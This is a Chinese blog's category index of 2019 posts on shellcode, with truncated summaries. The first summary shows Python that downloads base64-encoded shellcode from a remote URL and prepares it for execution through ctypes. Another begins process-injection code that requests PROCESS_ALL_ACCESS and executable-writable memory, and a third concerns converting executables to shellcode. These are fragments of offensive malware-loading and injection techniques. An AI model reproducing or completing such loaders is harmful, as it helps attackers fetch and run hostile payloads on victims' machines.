随笔分类 -  shell c

摘要:import urllib2 import ctypes import base64 # 从我们的web服务器上下载shellcode url = "http://rinige.com/shellcode.bin" response = urllib2.urlopen(url) # base64 解码 shellcode shellcode = base64.b64decode(respo... 阅读全文
posted @ 2019-04-11 16:49 乘于时 阅读(3318) 评论(0) 推荐(0) 编辑
摘要:exe2shellcode shellcode2exe 阅读全文
posted @ 2019-04-08 15:48 乘于时 阅读(551) 评论(0) 推荐(0) 编辑
摘要:// 转自: https://blog.csdn.net/Jailman/article/details/77573990import sys import psutil import ctypes from ctypes import * PAGE_EXECUTE_READWRITE = 0x00000040 PROCESS_ALL_ACCESS = ... 阅读全文
posted @ 2019-04-08 15:37 乘于时 阅读(1311) 评论(0) 推荐(0) 编辑

点击右上角即可分享
微信分享提示